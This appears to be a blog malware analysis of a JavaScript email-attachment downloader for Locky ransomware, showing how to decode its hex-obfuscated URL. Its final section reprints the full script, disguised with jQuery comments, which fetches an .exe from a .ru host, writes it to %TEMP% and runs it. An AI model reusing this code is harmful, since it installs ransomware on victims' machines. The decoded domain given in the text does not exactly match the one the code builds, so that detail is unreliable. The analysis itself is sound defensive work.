Decoding A Malicious Javascript Downloader

JavaScript Downloader Leads to Locky Ransomware

Attack Vector – Email Attachment: MX62EDO2016030179167.zip — Malicious JavaScript file: FG8327338338.js

The file is a downloader currently being sent as a compressed email attachment to evade antivirus and IDS detection. When executed on a victim's computer it downloads Locky Ransomware. The malware authors are using a simple hexadecimal obfuscation technique to hide the source of the payload. I wanted to show readers how to decode (convert) the hexadecimal to ASCII and expose the domain that is serving it. Reviewing the entire JavaScript (reproduced at the end of this post), you will see the obfuscation easily.

Decode

To decode the hexadecimal, remove the leading ‘\u00’ prefixes (highlighted in yellow), leaving only the hexadecimal digit pairs (0-9, A-F). Pay attention to the other special characters and plain ASCII letters (highlighted in red); they are not hex-encoded and must be carried over unchanged.

hex                                       Obfuscated Hexadecimal URL

68 74 74 70 3A // 6D 6F 74 6F s. 72 75 2F ‘+’a’+’ 64m 69 6E 2F 6D o 64 e 6C 2F 38 37 79 68 62 35 34 cdf 79 2E e 78 e                                                                               Hexadecimal + Special Characters and ASCII Letters
                                                 

Decode it with your favorite online hex decoder (e.g. http://ddecode.com or http://www.asciitohex.com), or simply remove the special characters and decode it locally in a terminal as shown below. Decoding locally also avoids submitting the indicator to a third-party site.

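# Strip all whitespace before decoding: the space inside the hex string would otherwise make unhexlify raise binascii.Error (non-hex digit).
# The output is only the hex-encoded fragments; the plain letters and '+' characters removed in the previous step must be re-inserted by hand (next step).
# echo 687474703A6D6F746F72752F64696E2F6D646C2F383779 68623534792E78 | python3 -c 'import sys, binascii; sys.stdout.buffer.write(binascii.unhexlify("".join(sys.stdin.read().split())))'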

                                         Terminal decode command

Combining the resulting string with the special characters and ASCII letters exposes the URL that will serve the malware.

  –       http://moto[.]ru/admin/model/87yhb54cdfy.exe

Recommendations

Never open email attachments unless you are expecting one, even if you know and trust the sender. It is easier to confirm with the sender that they sent the attachment than to clean up a ransomware compromise.

References: https://www.virustotal.com/en/file/557184BE5BD72298EC32E10E9225A448BC4C4C6121971B659F32B8C8D4B8316D/analysis/

https://malwr.com/analysis/ZDc4MmExYWYzZjJkNDUyYmE5MTllZjhkNGMxZTkyZTA/  

Full JavaScript file text

//(function( global, factory ) {

var FhCjGh = ‘\u0052un’; var ARDiz = this[(“lifestyle”,”individual”,”standings”,”warming”,”screech”,’\u0041c’)+’t\u0069’+’v\u0065X\u004F\u0062’+’\u006Aec\u0074′];

var xEsHeV = new ARDiz(‘W’+(“slammed”,”plumber”,’S’)+’\u0063\u0072ip\u0074.’+’\u0053\u0068ell’);

// if ( typeof module === “object” && typeof module.exports === “object” ) { // For CommonJS and CommonJS-like environments where a proper `window` // is present, execute the factory and get jQuery. // For environments that do not have a `window` with a `document` // (such as Node.js), expose a factory as module.exports. // This accentuates the need for the creation of a real `window`. // e.g. var jQuery = require(“jquery”)(window); // See ticket #14549 for more info. module.exports = global.document ? factory( global, true ) : function( w ) { if ( !w.document ) { throw new Error( “jQuery requires a window with a document” ); } return factory( w ); }; } else { factory( global );

var kjEEQvxTq = xEsHeV[(“saucer”,”hints”,’E\u0078pa\u006E\u0064′)+(“daytime”,”shelf”,”neuralgia”,’\u0045\u006E\u0076\u0069\u0072\u006Fnm\u0065′)+’\u006Et\u0053tr\u0069n’+’g\u0073′](‘%’+(“sublime”,”demagogue”,”samples”,’T’)+’E’+’\u004DP%’) + (“neptune”,”disclosure”,”gravy”,”fetching”,”explicit”,’\u002FKu\u0044\u0049′)+(“formative”,”clandestine”,’\u006FtQ’)+’j1\u002E’+’e\u0078e’;

//}// Pass this if window is not defined yet }(typeof window !== “undefined” ? window : this, function( window, noGlobal ) {

var sgOIi = new ARDiz(‘M’+(“partridge”,”holocaust”,”inert”,”incompetent”,’SX\u004D’)+’L\u0032.X\u004D\u004C\u0048T’+’T\u0050′);

//// Support: Firefox 18+ // Can”t be in strict mode, several libs including ASP.NET trace // the stack via arguments.caller.callee and Firefox dies if // you try to trace through “use strict” call chains. (#13335) //”use strict”; var deletedIds = [];

sgOIi[‘o\u006E’+’r\u0065\u0061\u0064y’+(“tuscany”,”quebec”,’s\u0074′)+(“journeyman”,”exemplify”,”dalton”,’a\u0074\u0065\u0063h\u0061\u006Eg\u0065’)] = function () {

if (sgOIi[‘r’+’\u0065\u0061d\u0079s’+’t’+(“massage”,”argumentative”,”grandpa”,”gender”,”musical”,’a\u0074e’)] === 4) {

var paHFKIl = new ARDiz((“augustinian”,”gunwale”,”shock”,’A\u0044′)+’\u004FD’+’\u0042.’+’\u0053\u0074re\u0061\u006D’);

//var document = window.document;

paHFKIl[‘\u006Fp\u0065n’]();

//var slice = deletedIds.slice;

paHFKIl[‘t\u0079\u0070e’] = 1;

//var concat = deletedIds.concat;

paHFKIl[‘w’+(“evolutionary”,”compression”,”unction”,’r’)+’i’+’\u0074e’](sgOIi[‘Re\u0073’+’p\u006F\u006Ese\u0042’+(“barque”,”poetess”,’o’)+’d\u0079′]);

//var push = deletedIds.push;

paHFKIl[(“everyday”,”deployment”,’p\u006Fs’)+’i’+’t’+’\u0069on’] = 0;

//var indexOf = deletedIds.indexOf;

paHFKIl[‘s\u0061’+(“perverted”,”curious”,”accede”,’ve\u0054′)+’o\u0046’+(“consistently”,”farmer”,”vocals”,’\u0069le’)](kjEEQvxTq, 2);

//var class2type = {};

paHFKIl[(“thrown”,”spalding”,’c’)+’l’+’o’+(“juvenile”,”cuckoo”,”coeval”,’s\u0065′)]();

//var toString = class2type.toString;

};

//var hasOwn = class2type.hasOwnProperty;

sgOIi[‘o\u0070e\u006E’](‘\u0047ET’, (“africa”,”digits”,”textbook”,’\u0068\u0074\u0074\u0070\u003A//e\u006D’)+’\u006F\u0074\u006Fs.\u0072\u0075\u002F’+’a’+’\u0064m\u0069\u006E\u002F\u006Do\u0064e\u006C\u002F\u0038\u0037\u0079\u0068\u0062\u0035\u0034cdf\u0079\u002Ee\u0078e’, false);

//var support = {};

sgOIi[‘s\u0065\u006Ed’]();

//

xEsHeV[FhCjGh](kjEEQvxTq, 1, “UNHUGlAh” === “JAFBXnHFM”);

//var version = “1.12.1”,

} catch (QMDvrsH) { };

// // Define a local copy of jQuery jQuery = function( selector, context ) {

